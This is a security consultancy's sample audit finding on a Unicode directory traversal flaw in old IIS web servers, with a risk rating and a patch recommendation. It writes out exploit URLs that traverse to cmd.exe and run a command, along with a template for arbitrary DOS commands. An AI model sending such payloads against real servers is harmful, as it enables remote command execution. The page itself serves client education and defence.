Call us on 01753 486700
or click here to request more information from LODOGA

Example Web server vulnerabilities (directory transversal)
 

Finding:

Unicode based Directory Traversal Vulnerability

Risk:

High

Explanation:

Typically directory transversal involves Unicode strings or conventional characters like “/../"
 

http://public.samplesite.co.uk:80/_vti_bin/..%C0%AF../..%C0%AF../..%C0%AF
../winnt/system32/cmd.exe?/c+dir

https://main.samplesite.co.uk:443/_vti_bin/..%C0%AF../..%C0%AF../..%C0%AF
../winnt/system32/cmd.exe?/c+dir
 

The exploit is formatted in the following way:


http://10.0.0.1/.../
http://10.0.0.1/.../.../directory/cmd.exe?c+[dos command]
 

Recommendation:

Patch the webserver to IIS 5.0.

Comments:

Directory transversal is a major vulnerability that is solved by patching servers correctly. There are few application level solutions, although piping all form submission and URL submissions through a single validation object may help.

Also see examples of other vulnerabilities:
 buffer overflows, cookie poisoning, cross-site scripts, email harvesting, HTTP methods, parameter tampering, server enumeration, SQL injection, web services enumeration. Also see out table of contents
Privacy Statement (c) LODOGA Limited 2007 Legal Notices